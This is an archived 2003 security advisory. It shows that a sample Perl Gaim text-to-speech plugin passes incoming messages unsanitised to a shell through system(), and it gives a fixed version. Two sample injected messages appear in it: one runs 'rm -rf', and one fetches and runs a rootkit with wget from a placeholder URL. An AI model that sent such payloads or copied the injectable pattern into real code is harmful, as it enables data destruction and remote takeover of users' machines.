gaimexploit.txt

2003-10-16T00:00:00
ID PACKETSTORM:31824
Type packetstorm
Reporter error
Modified 2003-10-16T00:00:00

Description

                                        
                                            `It has come to my attention that people have actually used this example  
code for a gaim plugin:  
  
AIM::register("Festival TTS", "0.0.1", "goodbye", "");  
AIM::print("Perl Says", "Loaded Festival TTS");  
AIM::command("idle", "60000") if ($pro ne "Offline");  
AIM::add_event_handler("event_im_recv", "synthesize");  
  
sub goodbye {  
AIM::print("Module Unloaded", "Unloaded Festival TTS");  
}  
  
sub synthesize {  
my $string = $_[0];  
$string =~ s/\<.*?\>//g;  
$string =~ s/\".*\"//;  
system("echo \"$string\" | /usr/bin/festival --tts");  
}  
  
As taken from:  
http://www.webreference.com/perl/tutorial/13/aim_fest_plugin.pl  
  
This has to be one of the most amusing ways to gain a local users  
privileges I have ever seen by an "Expert (TM)"  
  
Exploit code?  
You have a shell through gaim with that.  
  
Just pass it this message (or really any message for that matter):  
  
Hey, I just wanted to exploit your box, do you mind?"; rm -rf;  
  
Or perhaps:  
  
Hey, grab this root kit for me?";wget http://url/to/rootkit;chmod +x  
rootkit;./rootkit  
  
Perhaps someone should ask:  
  
"(Is s/[^\w]//g really that hard to do?!)"  
  
So a fixed version would look like this:  
  
AIM::register("Festival TTS", "0.0.1", "goodbye", "");  
AIM::print("Perl Says", "Loaded Festival TTS");  
AIM::command("idle", "60000") if ($pro ne "Offline");  
AIM::add_event_handler("event_im_recv", "synthesize");  
  
sub goodbye {  
AIM::print("Module Unloaded", "Unloaded Festival TTS");  
}  
  
sub synthesize {  
my $string = $_[0];  
$string =~ s/\<.*?\>//g;  
$string =~ s/\".*\"//;  
$string =~ s/[^\w]//g;  
system("echo \"$string\" | /usr/bin/festival --tts");  
}  
  
Just a minor comment, nothing special.  
--   
error <error@lostinthenoise.net>  
`